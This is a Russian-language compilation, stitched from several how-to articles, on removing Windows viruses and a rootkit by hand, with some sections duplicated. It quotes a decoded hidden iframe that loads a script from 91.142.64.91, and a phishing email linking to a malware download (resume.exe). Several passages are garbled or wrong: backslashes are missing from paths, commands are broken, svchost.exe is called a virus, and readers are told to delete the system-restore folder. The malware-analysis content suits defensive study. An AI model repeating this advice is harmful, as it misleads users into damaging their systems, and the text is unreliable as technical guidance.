Пришлось все вирусы удалять вручную. Windows: Удаляем вирус из системы вручную

Сегодня речь пойдет о том, как удалить вирусы с компьютера самостоятельно и, что самое главное, бесплатно.

Статья с сайта Teryra.com!

Недавно я столкнулся с таким заражением компьютера, на лечение которого у меня не хватило знаний, а их, поверьте, не так уж и мало.

Как удалить вирусы с компьютера. Видео урок.

Для начала посмотрите подробный видео урок, и если останутся вопросы, то читайте в статью ниже, в ней все будет подробно описано.


Инструкция по удалению вирусов с компьютера самостоятельно.

Для того удалить вирусы с компьютера, проведите действия:

  1. Обновите базы своего антивируса до последней версии. Кстати, чаще всего, антивирус сам проверяет обновления при подключении к интернету и скачивает их. У всех антивирусы конечно же разные, однако пункт обновление есть абсолютно у всех. Так что откройте ваш антивирус (его иконка расположена в области уведомлений, в правом нижнем углу, чуть левее часов, поищите, она там точно есть), выберите на пункт обновление, а после нажмите на фразу типа "Обновить сейчас".
  2. После того как обновление закачается,
  3. полностью проверьте компьютер .
  4. Этот пункт находиться во вкладке типа "Сканирование ПК" или "Проверка компьютера" и там выберите полную проверку. Если у вас не пункта полной проверки ПК, то тогда в пункте выборочной проверки, выделите все ваши диски и начните проверку.
  5. Полная проверка идет очень долго, дождитесь её окончания. У меня, например, она шла больше 12 часов. По окончании полной проверки, те файлы которые можно вылечить, вылечите те которые нельзя удалите. В принципе там все будет понятно, делайте то. Что предлагает антивирус. Разумеется, если найдутся какие-либо трояны и вирусы, антивирусник их удалит.
  6. После того, как вы проверите компьютер своим антивирусом, скачайте утилиту Dr.Web CureIt и проверьте ею весь компьютер, о том как это делать я рассказывал в . Кстати, если у вас основным антивирусом установлен Dr.Web, тогда я вам советую скачать другую утилиту, от лаборатории Касперского - . На странице с ссылкой есть подробная инструкция по скачке и установке.
  7. Что первой, что второй утилитой нужно проверять в безопасном режиме.
  8. Для этого перезагрузите компьютер, и нажимайте раз в секунду (можно чаще) на клавишу F8. В открывшемся меню выберите пункт "Безопасный режим" (чаще всего он первый). После загрузки Windows в данном режиме, зайдите в то место, куда вы сохранили скачанную вами утилиту (из выше предложенных) и запустите их. По окончании проверки, файлы которые можно вылечить - лечите, те которые нельзя удаляйте. Там по ходу выполнения все будет понятно. Кстати, я, на всякий случай, проверил обеими утилитами, и каждая нашла вирусы.

В принципе, для многих пользователей ПК на этом, проверка компьютера на вирусы закончилась бы.

Но у меня была другая проблема - кто-то взломал мои сайты, получив к ним доступы через мой компьютер. Поэтому после того, как я проделал все, о чем писал выше, я решил проверить, остались ли доступы у вирусов к моим сайтам.

Через пару часов проверки понял, что доступы по-прежнему открыты, а значит дыра в безопасности не ликвидирована. Троянский вирус воровал мои логины и пароли. Как удалить троян с компьютера я уже не знал, поэтому ринулся в интернет, и там нашел один очень интересный сайт...

Сказ о том, как мне помогли удалить троян с компьютера.

После недолгих поисков в интернете, я наткнулся на сайт . Почитав информацию на нем, я понял, что люди, лечащие там компьютеры, серьезно разбираются в вопросах безопасности и решил к ним обратиться. Но к моему счастью у них сайте, есть инструкция, как удалить вирусы с компьютера самому и что самое главное, сделать это совершенно бесплатно. Я решил ею воспользоваться, и проблема с троянами была решена! В принципе там все просто, но на всякий случай я вкратце объясню .

Помощь Virusinfo.

Первое что вам нужно сделать, этой перейти на сайт по ссылке выше и зарегистрироваться на форуме, для того чтобы в дальнейшем описать свою проблему.



Это я объяснять не буду, так как там все просто.

После того, как зарегистрируйтесь, переходите ко второму шагу,



В нем описаны действия, которые вам необходимо выполнить. Первое что там предложено, это скачать копию инструкции себе на компьютер, так как иногда вам придется отключаться от интернета.



После того как вы её скачаете, смотрите пункты далее.



Выполняйте эти пункты по порядку. Кстати, если вы заметили, пункты 3,4,5 совпадают с тем, что я всегда говорил в уроках про безопасность, и упомянул в этой статье.

После чего идет самое интересное, вам нужно скачать две специальные утилиты AVZ и HiJackThis .



Для того чтобы скачать AVZ просто кликните по предложенной там ссылке и вам на компьютер закачается архив, который нужно распаковать. Как это делать я рассказывал . Устанавливать ничего не нужно.

Для того чтобы скачать HiJackThis, так же нажмите по предложенной там ссылке. Вас перебросит на сайт, где вам нужно будет нажать на кнопку Download.



Эту программу тоже не нужно устанавливать.

Когда все скачаете, просто следуйте инструкциям, которые даны там далее.

Когда вы все выполните, вам нужно будет создать новую тему на форуме. Для этого нажмите на ссылку "Помогите"



После чего вас перебросит в форум. Если вы помните вы уже зарегистрированы, так что можете смело нажимать "Новая тема"



В названии не нужно писать просто "Помогите!" и т.п., раздел и так называется помощь. Просто в двух словах дайте название темы, например "меня взломали, не знаю что делать, помогите пожалуйста".



После чего прикрепите к теме те файлы, о которых говорилось в конце инструкции. Для этого нажмите на пункт "Управление вложениями"



В открывшемся окне выберите "Добавить файлы"



Откроется еще одно окно, в котором вам необходимо нажать "Выбрать файлы"



Найдите и выделите те файлы о которых говориться в конце инструкции. И нажмите "Открыть". После нажмите Upload Files



Они закачаются. После чего просто нажмите Готово и они добавятся к вашей теме.



Теперь нажимаете создать новую тему, и ждете ответов и дальнейших инструкций. У меня все решилось в течении двух дней.

После проверки и чистки компьютера по рекомендации ребят из Virusinfo, я очистил код сайтов, после чего вирусы больше не возвращались .

Надеюсь, вас стало ясно, как удалить вирусы с компьютера самому.

Успехов!

На сегодняшний день существует множество различных вирусов и вредоносных кодов, которые способны негативно воздействовать на всю систему в целом, а также отдельные ее элементы, приводя к сбоям. Поэтому вопрос удаления вируса актуален среди современных пользователей.


Необходимо знать, как избавиться от заразы не причинив вреда ценным материалам.

Удаление вирусов и троянов с компьютера вручную

Сначала необходимо скачать антивирусную программу Касперского или NOD32. Это позволит провести глубокую проверку жесткого носителя и выявить различные вредоносные приложения. Рекомендуется осуществлять данную процедуру в безопасном режиме, однако предварительно следует использовать загрузку последней успешной конфигурации. Возможно, причиной выхода системы из строя является, а обыкновенный сбой. Далеко не всем пользователям известно, как войти в безопасный режим. На самом деле, все достаточно просто.

В процессе запуска компьютера нужно нажать на F8, в результате чего отобразится меню, где будет предложено выбрать данный режим. Он способен начать работу операционной системы без основных программ и драйверов. Это обеспечивает полную проверку на вирусы за короткое время. Основная проблема состоит в том, что антивирусные программы не проверяют большинство файлов, которые предусмотрены для работы.

Зачастую данная процедура не обнаруживает вирус, поэтому необходимо скачать приложение Dr.web Cureit, доступ для которого открыт каждому пользователю. После этого необходимо снова провести глубокую проверку. В процессе нее существует высокая вероятность того, что вирусы будут выявлены. Затем следует выполнить очистку автоматической загрузки, перейти в «Пуск» и выбрать вкладку «Выполнить».

Далее понадобится ввести слово «msconfig». В результате на экране отобразится настройка системы. Потребуется зайти в раздел «Автозагрузка». Отметки будут установлены около объектов, которые, возможно, подверглись заражению. Как правило, ними выступают следующие элементы:

C:WINDOWSINF*.exe / %windir%system328353.exe;
C:WINDOWSsecuritysmss.exe / %windir%system32smphost.exe.

Необходимо проверить, действительно ли была установлена данные программы. Если нет, рекомендуется убрать с них отметки. Наибольшую опасность представляет вирус, имеющий название svchost.exe. Причина его негативного воздействия состоит в способности шифровки под различные службы устройства. В диспетчере задач их около шести, поэтому, если данный файл отображается, стоит удалить его в режиме автозагрузки. Необходимо помнить, что svchost.exe не должен присутствовать там ни в коем случае.

После этого потребуется провести очистку остальных объектов. Как правило, вредоносные программы таятся в папке, где сохраняются файлы для восстановления операционной системы. Таким образом, придется удалить ее всю. Необходимо очистить папку temp и все временные файлы, скачанные из интернета. Для того чтобы вся процедура прошла максимально быстро, предлагается использовать программу Ccleaner.

Как избавиться от вируса в «Одноклассниках» и «ВКонтакте»?

Существует вариант полного удаления операционной системы, а затем ее повторной установки. Однако не стоит спешить идти на такие крайние меры. Сначала рекомендуется скачать несколько антивирусных программ. При помощи них по очереди проводится глубокая проверка на вирусы. Также можно оставить компьютер на ночь, если совершенно нет времени. Вирусы из социальных сетей способны проникать в файл hosts. В нем наблюдаются разные строки, но зачастую – 127.0.0.1 localhost.

При проникновении в него вируса возникают довольно странные строчки, которых раньше не существовало. В результате осуществляется блокировка сайта, поэтому следует проверить hosts, который находится по адресу C:WINDOWSsystem32driversetchosts. При переходе в него можно увидеть строчки, дописанные вирусом, а также удалить их, чтобы вновь получить доступ к сайту.

Как избавиться от вируса с флешки?

Стоит отметить, что выявить наличие вируса на флешке достаточно просто. Он способен выдать себя при открытии носителя, в результате чего отобразится информация об ошибке. Такое явление может наблюдаться довольно часто. Иногда вся информация с флешки и вовсе удаляется. В таких случаях даже проводник не поможет открыть ее. Возникает ошибка на неизвестном языке, чем-то напоминающем иероглифы.

Чтобы удалить вирус, можно использовать следующий способ:

1. Зайти в «Пуск».
2. Перейти в раздел «Выполнить».
3. Ввести cmd.exe и нажать кнопку «ОК».

После этого необходимо прописать в командной строке следующие команды:

Del /a-hrs Xautorun.inf;
del /a-hrs Xautorun.txt;
del /a-hrs Xautorun.bin;
del /a-hrs Xautorun.wsh;
del /a-hrs Xautorun.reg;
del /a-hrs XAutorun.~ex;
del /a-hrs Xautorun.inf_?????
del /a-hrs Xautorun.srm;
del /a-hrs XAUTORUN.FCB.

Иксом выступает название флешки, его нужно вставить вместо буквы. Зараженные файлы из папки system32 следует удалить. После этого можно проверить флешку при использовании антивирусов.

Ваш компьютер может быть заражен вирусом разными способами, например, через интернет-браузер, USB устройство, а также путем установки зараженных программ. Более того, вирусы бывают разными: одни заставляют работать компьютер медленнее, а другие – воруют персональные данные. В любом случае, ничего хорошего вирусы не представляют, поэтому лучше как можно скорее удалить их.

В этой статье вы знаете о парочке способов как удалить вирус с компьютера без антивируса.

Удалите вирус через командную строку

1. Прежде всего, нажмите «Пуск » и введите cmd . Дальше щелкните правой кнопкой мыши на значке cmd и выберите «Запуск от имени администратора ». Откроется окно командной строки.

2. В командной строке вам нужно перейти на диск, на котором может быть расположен вирус. Допустим, это диск D, тогда вам нужно набрать dir D: attrib -s -h /s /d *.* , и нажать enter .


3. В окне командной строки вы увидите все файлы, которые находятся на выбранном диске.


4. Внимательно посмотрите список, и если вы заметите необычный файл file.exe и любой файл autorun.inf, тогда переименуйте его с помощью команды rename filename.extension new filename .


Вот и все! Вирус обезврежен, и он больше не несет опасности вашему компьютеру.

Отключите подозрительные службы в диспетчере задач

1. Откройте диспетчер задач, нажав клавиши CTRL + SHIFT + ESCAPE . Дальше завершите все подозрительные службы в разделе «Службы ».


2. В окне диспетчера задач нажмите на «Файл » и выберите «Запустить новую задачу ». Введите msconfig и нажмите «ОК ».


4. Теперь перейдите к следующей вкладке «». Здесь просмотрите все подозрительные и нежелательные программы, и в случае чего – отключите ее.


5. После того, как вы обнаружили все подозрительные службы, процессы и программы, откройте командную строку и измените атрибут файла, как описано в первом методе.

Используйте онлайн-сканер для обнаружения вируса на компьютере

VirusTotal


VirusTotal - это бесплатный сервис, который сканирует подозрительные файлы и URL-адреса, тем самым облегчает обнаружение вирусов, червей, троянов и всех видов вредоносных программ.

1. Перейдите на сайт www.virustotal.com со своего основного браузера.

2. Теперь вам нужно отсканировать подозрительные файлы на компьютере. Обратите внимание, что максимальный размер файла - 128 МБ.

3. Также Virustotal позволяет сканировать определенные URL-адреса и даже целые сайты. Для этого вам просто нужно ввести адрес сайта в строке «URL».

Metadefender


Metadefender является одним из самых популярных приложений и платформ для обнаружения вирусов. Сервис позволяет выбрать файл размером до 140 МБ.

1. Перейдите на веб-сайт Metadefender Online Scanner со своего веб-браузера.


Если файл, который вы выбрали, действительно содержит вирус или вредоносное ПО, сервис предоставит детальный отчет об угрозе.

Kaspersky VirusDesk


Kaspersky Virus Desk проверяет файлы так же, как антивирусная программа «Лаборатории Касперского». Более того, онлайн сервис использует ту же антивирусную базу, что и полноценный антивирус на компьютере. Kaspersky VirusDesk уведомляет вас об известных угрозах и отображает подробную информацию о них. Тем не менее, онлайн-сервис не лечит файлы.

Kaspersky VirusDesk может сканировать файлы размером до 50 МБ. Если вы хотите отсканировать несколько файлов, объедините их в.zip-файл.

1. Сначала перейдите на сайт Kaspersky Virus Desk с вашего компьютера.

2. Вы увидите экран, на который можно перетащить файлы или вставить ссылку для сканирования. Затем нажмите кнопку «Сканировать».

3. Обычно сканирование занимает менее двух минут. Подождите, пока процесс будет завершен.

4. После этого вы увидите экран, как на изображении ниже. Если Kaspersky VirusDesk обнаружит вредоносное ПО или вирус, он даст вам знать.

Теперь вы знаете, как удалить вирус с компьютера без антивируса. С помощью специальных онлайн сервисов вы можете обнаружить вредоносные программы, а командная строка поможет удалить вирус.

Как удалить вирус и трояны с компьютера вручную Для начала нужно скачать антивирус Касперского или 360 Total, чтобы провести глубокую проверку жесткого диска на наличие вредоносных программ. Желательно проводить процедуру в безопасном режиме, но предварительно использовать процедуру: загрузка последней успешной конфигурации. Скорее всего, это не вирус вывел компьютер из строя, а простой сбой в системе. Но не все знают, как войти в безопасный режим, это очень просто: во время запуска компьютера нажмите на F8, появится меню, где можно выбрать данный режим. Этот режим запускает работу WINDOWS без основных программ и драйверов, что гарантирует полную проверку на вирусы в сжатые сроки. Проблема заключается в том, что антивирусы не проверяют многие файлы, которые задействованы в работе (программы). Нередко проверка не выявляет вирус, поэтому нужно скачать утилиту Dr.web Cureit, которая находится в свободном доступе. Вновь проведите глубокую проверку, на этот раз, скорее всего, вирусы будут обнаружены. Далее нужно провести очистку автоматической загрузки, зайдите в пуск и выберите вкладку «выполнить», потом наберите слово «msconfig». Появится настройка системы, зайдите в раздел «автозагрузка». Галочкой будут отмечены объекты, которые могли быть заражены. В большинстве случаев зараженными оказываются следующие элементы: C:WINDOWSINF*.exe / %windir%system328353.exe; C:WINDOWSsecuritysmss.exe / %windir%system32smphost.exe. Это показывает загрузку вредоносного объекта. Проверьте, действительно ли вы устанавливали данные программы? Если нет – уберите с них галочки. Наиболее опасен вирус под названием svchost.exe, потому что он имеет свойство шифровки под всевозможные службы вашего компьютера. В диспетчере задач таких служб около шести, поэтому удалите данный файл в режиме автозагрузки, если он отображается. Помните, что svchost.exe не должен отображаться в автозагрузке ни в коем случае. Далее нужно очистить остальные объекты. Чаще всего вредоносные программы попадают в папку, где хранятся файлы для восстановления WINDOWS. Разумеется, всю папку придется удалить. Очистите папку под названием temp и все временные файлы из сети интернет. Чтобы провести всю работу максимально быстро, воспользуйтесь программой Ccleaner. Как удалить вирус в одноклассниках / в контакте Нередко программисты подшучивают и говорят, что нужно удалять WINDOWS и вновь устанавливать. Конечно, это сработает, но есть и другие подходы. Для начала нужно скачать несколько антивирусов, потому что то, что видит NOD32, может не увидеть Касперский и наоборот. По очереди проведите глубокую проверку на вирусы, можете оставить компьютер на ночь, если у вас совсем нет времени. Вирусы из социальных сетей могут проникнуть в файл hosts, в нем содержатся разные строки, но в первую очередь – 127.0.0.1 localhost. Когда в него проникает вирус, появляются странные строчки, которых раньше не было. Происходит блокировка сайта «Вконтакте», поэтому проверьте hosts, он находится по адресу – C:WINDOWSsystem32driversetchosts. Там вы увидите строчки дописанные вирусом, удалите их, чтобы вернуть доступ к сайту. Как удалить вирус с флешки Обнаружить вирус на флешке очень просто, он выдает себя, когда вы открываете флешку и появляется информация об ошибке. Происходит это очень часто, в некоторых случаях вся информация с флешки скрывается или удаляется. Причем даже проводник не помогает открыть ее, появляется ошибка на неизвестном языке, напоминающем иероглифы. Избавиться от вируса можно следующим способом: заходите в пуск – выполнить – набираете cmd.exe и нажимаете ОК. Далее напишите в командной строке следующие команды: del /a-hrs Xautorun.inf; del /a-hrs Xautorun.txt; del /a-hrs Xautorun.bin; del /a-hrs Xautorun.wsh; del /a-hrs Xautorun.reg; del /a-hrs XAutorun.~ex; del /a-hrs Xautorun.inf_????? del /a-hrs Xautorun.srm; del /a-hrs XAUTORUN.FCB. Иксом является название вашей флешки, соответственно, вставляете его вместо буквы. Так как зараженные файлы могут находиться в папке WINDOWS – system32, нужно удалить их оттуда. Можно проверить носитель и с помощью антивирусов, но как уже говорилось выше – нужно использовать несколько антивирусов, чтобы найти все вредоносные программы. Перед тем как вставить флешку в компьютер убедитесь, что ваш антивирус активен, иначе компьютер будет заражен.

Удаляем вирус из системы.

Что делать, если антивирус не справился со своей работой.

Вы, наверно, неоднократно встречали информацию в СМИ о том, что появился новый страшный вирус, который может привести к новой страшной эпидемии и чуть ли не к концу Интернета. Или, что появилась новая технология вирусописания, основанная на использовании младших битов пикселей графических изображений, и тело вируса практически невозможно обнаружить. Или... много еще чего страшненького. Иногда вирусы наделяют чуть ли не разумом и самосознанием. Происходит это от того, что многие пользователи, запутавшись в сложной классификации и подробностях механизма функционирования вирусов, забывают, что в первую очередь, любой вирус - это компьютерная программа, т.е. набор процессорных команд (инструкций), оформленных определенным образом. Неважно, в каком виде существует этот набор (исполняемый файл, скрипт, часть загрузочного сектора или группы секторов вне файловой системы) - гораздо важнее, чтобы эта программа не смогла получить управление, т.е. начать выполняться. Записанный на ваш жесткий диск, но не запустившийся вирус, также безобиден, как и любой другой файл. Главная задача в борьбе с вирусами - не обнаружить тело вируса, а предотвратить возможность его запуска. Поэтому грамотные производители вирусов постоянно совершенствуют не только технологии занесения вредоносного программного обеспечения в систему, но и способы скрытного запуска и функционирования.

Как происходит заражение компьютера вредоносным программным обеспечением (вирусом)? Ответ очевиден - должна быть запущена какая-то программа. Идеально - с административными правами, желательно - без ведома пользователя и незаметно для него. Способы запуска постоянно совершенствуются и основаны, не только на прямом обмане, но и на особенностях или недостатках операционной системы или прикладного программного обеспечения. Например, использование возможности автозапуска для сменных носителей в среде операционных систем семейства Windows привело к распространению вирусов на флэш-дисках. Функции автозапуска обычно вызываются со сменного носителя или из общих сетевых папок. При автозапуске обрабатывается файл Autorun.inf . Этот файл определяет, какие команды выполняет система. Многие компании используют эту функцию для запуска инсталляторов своих программных продуктов, однако, ее же, стали использовать и производители вирусов. В результате, об автозапуске, как некотором удобстве при работе за компьютером, можно забыть. - большинство грамотных пользователей данную опцию отключили навсегда. На сайте технической поддержки Microsoft имеется специальная методика Отключения функций автозапуска в Windows
reg-файл для импорта в реестр, обеспечивающий отключение автозапуска.

Но основным "поставщиком" вирусов, несомненно, является Интернет и, как основное прикладное программное обеспечение - "Обозреватель Интернета" (браузер). Сайты становятся все сложнее и красивее, появляются новые мультимедийные возможности, растут социальные сети, постоянно увеличивается количество серверов и растет число их посетителей. Обозреватель Интернета постепенно превращается в сложный программный комплекс - интерпретатор данных, полученных извне. Другими словами, - в программный комплекс, выполняющий программы на основании неизвестного содержимого. Разработчики обозревателей (браузеров) постоянно работают над повышением безопасности своих продуктов, однако производители вирусов тоже не стоят на месте, и вероятность заражения системы вредоносным ПО остается довольно высокой. Существует мнение, что если не посещать "сайты для взрослых", сайты с серийными номерами программных продуктов и т.п. то можно избежать заражения. Это не совсем так. В Интернете немало взломанных сайтов, владельцы которых даже не подозревают о взломе. И давно прошли те времена, когда взломщики тешили свое самолюбие подменой страниц (дефейсом). Сейчас подобный взлом обычно сопровождается внедрением в страницы вполне добропорядочного сайта, специального кода для заражения компьютера посетителя. Кроме того, производители вирусов используют наиболее популярные поисковые запросы для отображения зараженных страниц в результатах выдачи поисковых систем. Особенно популярны запросы с фразами "скачать бесплатно" и " скачать без регистрации и SMS". Старайтесь не использовать эти слова в поисковых запросах, иначе, риск получения ссылки на вредоносные сайты значительно возрастает. Особенно, если вы ищете популярный фильм, еще не вышедший в прокат или последний концерт известнейшей группы.

Механизм заражения компьютера посетителя сайта, в упрощенном виде, я попробую объяснить на примере. Не так давно, при посещении одного, довольно популярного сайта, я получил уведомление программы мониторинга автозапуска (PT Startup Monitor) о том, что приложение rsvc.exe пытается выполнить запись в реестр. Приложение было благополучно прибито FAR"ом, а изменения в реестре отменены PT Startup Monitor"ом. Анализ страниц сайта показал наличие странного кода на языке Javascript, выполняющего операции по преобразованию строковых данных, не являющихся осмысленным текстом. Язык Javascript поддерживается большинством современных браузеров и используется практически на всех веб-страницах. Сценарий, загружаемый с таких страниц, выполняется обозревателем Интернета. В результате многочисленных преобразований упомянутых выше строк получался довольно простой код:

iframe src="http://91.142.64.91/ts/in.cgi?rut4" width=1 height=1 style="visibility: hidden"

означающий выполнение CGI-сценария сервера с IP - адресом 91.142.64.91 (не имеющего никакого отношения к посещаемому сайту) в отдельном окне (тег iframe) размером 1 пиксель по ширине и 1 пиксель по высоте, в невидимом окне. Результат - вполне вероятное вирусное заражение. Особенно, если нет антивируса или он не среагирует на угрозу. Данный пример скрытого перенаправления посетителя на вредоносный сайт с использованием тега "iframe" сегодня, наверно, не очень актуален, но вполне демонстрирует как, посещая легальный сайт, можно незаметно для себя побывать и на другом, не очень легальном, даже не подозревая об этом. К сожалению, абсолютной гарантии от вирусного заражения нет и нужно быть готовым к тому, что с вирусом придется справляться собственными силами.

В последнее время, одним из основных направлений развития вредоносных программ стало применение в них всевозможных способов защиты от обнаружения антивирусными средствами - так называемые руткит (rootkit) - технологии. Такие программы часто или не обнаруживаются антивирусами или не удаляются ими. В этой статье я попытаюсь описать более или менее универсальную методику обнаружения и удаления вредоносного программного обеспечения из зараженной системы.

Удаление "качественного" вируса, становится все более нетривиальной задачей, поскольку такой вирус разработчики снабжают свойствами, максимально усложняющими ее решение. Нередко вирус может работать в режиме ядра (kernel mode) и имеет неограниченные возможности по перехвату и модификации системных функций. Другими словами - вирус имеет возможность скрыть от пользователя (и антивируса) свои файлы, ключи реестра, сетевые соединения, - все, что может быть признаком его наличия в зараженной системе. Он может обойти любой брандмауэр, системы обнаружения вторжения и анализаторы протоколов. И, кроме всего прочего, он может работать и в безопасном режиме загрузки Windows. Иными словами, современную вредоносную программу очень непросто обнаружить и обезвредить.

Развитие антивирусов тоже не стоит на месте, - они постоянно совершенствуются, и в большинстве случаев, смогут обнаружить и обезвредить вредоносное ПО, но рано или поздно, найдется модификация вируса, которая какое-то время будет "не по зубам" любому антивирусу. Поэтому самостоятельное обнаружение и удаление вируса - это работа, которую рано или поздно придется выполнять любому пользователю компьютера.

Здравствуйте.
Нас заинтересовала ваша кандидатура, однако предлагаем вам заполнить
наш фирменный бланк резюме и отправить его по адресу [email protected]
Ответ не гарантируется, однако если Ваше резюме нас заинтересует, мы
позвоним Вам в течение нескольких дней. Не забудьте
указать телефон, а также позицию, на которую Вы претендуете. Желательно
также указать пожелания по окладу.
Наш фирменный бланк вы можете скачать по нижеуказанной ссылке.
http://verano-konwektor.pl/resume.exe

Анализ заголовков письма показал, что оно было отправлено с компьютера в Бразилии через сервер, находящийся в США. А фирменный бланк предлагается скачать с сервера в Польше. И это с русскоязычным-то содержанием.

Ясное дело, что никакого фирменного бланка вы не увидите, и скорее всего, получите троянскую программу на свой компьютер.
Скачиваю файл resume.exe. Размер - 159744 байта. Пока не запускаю.
Копирую файл на другие компьютеры, где установлены различные антивирусы - просто для очередной проверки их эффективности. Результаты не ахти - антивирус Avast 4.8 Home Edition деликатно промолчал. Подсунул его Symantec"у - та же реакция. Сработал только AVG 7.5 Free Edition. Похоже, этот антивирус, в самом деле, не зря набирает популярность.
Все эксперименты выполняю на виртуальной машине с операционной системой Windows XP. Учетная запись с правами администратора, поскольку, чаще всего вирусы успешно внедряются в систему только, если пользователь является локальным администратором.
Запускаю. Через какое-то время зараженный файл исчез, похоже, вирус начал свое черное дело.
Поведение системы внешне не изменилось. Очевидно, нужна перезагрузка. На всякий случай, запрещаю в брандмауэре соединения по протоколу TCP. Оставляю разрешенными только исходящие соединения по UDP:53 (DNS) - надо же оставить вирусу хоть какую-то возможность проявить свою активность. Как правило, после внедрения, вирус должен связаться с хозяином или с заданным сервером в интернете, признаком чего будут DNS-запросы. Хотя, опять же, в свете сказанного выше, умный вирус может их замаскировать, кроме того, он может и обойти брандмауэр. Забегая вперед, скажу, что в данном конкретном случае этого не произошло, но для надежного анализа сетевой активности весь трафик зараженной машины лучше пустить через другую, незараженную, где можно быть уверенным, что правила брандмауэра выполняются, а анализатор трафика (я пользовался Wireshark"ом) выдает то, что есть на самом деле.
Перезагружаюсь. Внешне ничего не изменилось, кроме того, что невозможно выйти в интернет, поскольку я сам отключил такую возможность. Ни в путях автозапуска, ни в службах, ни в системных каталогах не появилось ничего нового. Просмотр системного журнала дает только одну наводку - системе не удалось запустить таинственную службу grande48 . Такой службы у меня быть не могло, да и по времени это событие совпало с моментом внедрения. Что еще наводит на мысль об успешном внедрении - так это отсутствие в реестре записи о службе grande48 и отсутствие второго сообщения в журнале системы об ошибке запуска службы после перезагрузки. Это, скорее всего, некоторая недоработка вирусописателей. Хотя и несущественная, ведь большинство пользователей журнал событий не просматривают, да и на момент возникновения подозрения на заражение эта запись в журнале уже может и отсутствовать.

Определяем наличие вируса в системе.

1. Наверняка должен быть "левый" трафик. Определить можно с помощью анализаторов протокола. Я использовал Wireshark. Сразу после загрузки первым запускаю его. Все правильно, есть наличие группы DNS-запросов (как потом оказалось - один раз за 5 минут) на определение IP-адресов узлов ysiqiyp.com, irgfqfyu.com, updpqpqr.com и т.п. Вообще-то все ОС Windows любят выходить в сеть, когда надо и не надо, антивирусы могут обновлять свои базы, поэтому определить принадлежность трафика именно вирусу довольно затруднительно. Обычно требуется пропустить трафик через незараженную машину и серьезно проанализировать его содержимое. Но это отдельная тема. В принципе, косвенным признаком ненормальности сетевой активности системы могут быть значительные значения счетчиков трафика провайдера, в условиях простоя системы, счетчики из свойств VPN-соединения и т.п.

2. Попробуем использовать программы для поиска руткитов. Сейчас таких программ уже немало и их несложно найти в сети. Мне больше всего нравится простая и быстрая утилита RootkitRevealer (Скачать, 231кб) Марка Руссиновича. Можно скачать отсюда:(Скачать, 231кб) Инсталляция не требуется. Разархивируем и запускаем. Жмем "Scan". После непродолжительного сканирования видим результаты:

Кстати, даже не вникая в содержания строк, можно сразу заметить, что имеются очень "свежие" по времени создания/модификации записи или файлы (колонка "Timestamp") . Нас в первую очередь должны заинтересовать файлы с описанием (колонка "Description" ) - "Hidden from Windows API" - скрыто от API-интерфейса Windows. Скрытие файлов, записей в реестре, приложений - это, естественно, ненормально. Два файла - grande48.sys и Yoy46.sys - это как раз то, что мы ищем. Это и есть прописавшийся под видом драйверов искомый руткит или его часть, обеспечивающая скрытность. Наличие в списке остальных было для меня сюрпризом. Проверка показала - это нормальные драйверы Windows XP. Кроме того, вирус скрывал их наличие только в папке \system32 , а их копии в \system32\dllcache остались видимыми.
Напомню, что в Windows XP применяется специальный механизм защиты системных файлов, называемый Windows File Protection (WFP) . Задача WFP - автоматическое восстановление важных системных файлов при их удалении или замене устаревшими или неподписанными копиями. Все системные файлы Windows XP имеют цифровую подпись и перечислены в специальной базе данных, используемой WFP. Для хранения копий файлов используется папка \system32\dllcache и, отчасти, \Windows\driver cache . При удалении или замене одного из системных файлов, WFP автоматически копирует "правильную" его копию из папки \dllcache. Если указанный файл отсутствует в папке \dllcache , то Windows XP просит вставить в привод компакт-дисков установочный компакт-диск Windows XP. Попробуйте удалить vga.sys из \system32, и система тут же его восстановит, используя копию из dllcache. А ситуация, когда, при работающей системе восстановления файлов, файл драйвера есть в \dllcache и его не видно в \system32 - это тоже дополнительный признак наличия руткита в системе.

Удаляем вирус из системы.

Осталось выполнить самое важное действие - удалить вирус. Самый простой и надежный способ - загрузиться в другой, незараженной операционной системе и запретить старт драйверов руткита.

Воспользуемся стандартной консолью восстановления Windows. Берем установочный диск Windows XP и загружаемся с него. На первом экране выбираем 2-й пункт меню - жмем R.


Выбираем систему (если их несколько):


Вводим пароль администратора.
Список драйверов и служб можно просмотреть с помощью команды listsvc:


В самом деле, в списке присутствует Yoy46 , правда отсутствует grande48, что говорит о том, что файл драйвера grande48.sys скрытно присутствует в системе, но не загружается:


Консоль восстановления позволяет запрещать или разрешать запуск драйверов и служб с помощью команд disable и enable . Запрещаем старт Yoy46 командой:


Водим команду EXIT и система уходит на перезагрузку.
После перезагрузки драйвер руткита не будет загружен, что позволит легко удалить его файлы и очистить реестр от его записей. Можно проделать это вручную, а можно использовать какой-нибудь антивирус. Наиболее эффективным, с моей точки зрения, будет бесплатный сканер на основе всем известного антивируса Dr.Web Игоря Данилова. Скачать можно отсюда - http://freedrweb.ru
Там же можно скачать "Dr.Web LiveCD" - образ диска, который позволяет восстановить работоспособность системы, пораженной действиями вирусов, на рабочих станциях и серверах под управлением Windows\Unix, скопировать важную информацию на сменные носители либо другой компьютер, если действия вредоносных программ сделали невозможным загрузку компьютера. Dr.Web LiveCD поможет не только очистить компьютер от инфицированных и подозрительных файлов, но и попытается вылечить зараженные объекты. Для удаления вируса нужно скачать с сайта DrWeb образ (файл с расширением.iso) и записать его на CD. Будет создан загрузочный диск, загрузившись с которого, руководствуетесь простым и понятным меню.

Если по каким-либо причинам, нет возможности воспользоваться Dr.Web LiveCD, можно попробовать антивирусный сканер Dr.Web CureIt!, который можно запустить, загрузившись в другой ОС, например, с использованием Winternals ERD Commander. Для сканирования зараженной системы необходимо указать именно ее жесткий диск (Режим "Выборочная проверка"). Сканер поможет вам найти файлы вируса, и вам останется лишь удалить связанные с ним записи из реестра.
Поскольку вирусы научились прописываться на запуск в безопасном режиме загрузки, не мешает проверить ветку реестра:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot
Разделы:
Minimal - список драйверов и служб запускаемых в безопасном режиме (Safe Mode)
Network - то же, но с поддержкой сети.

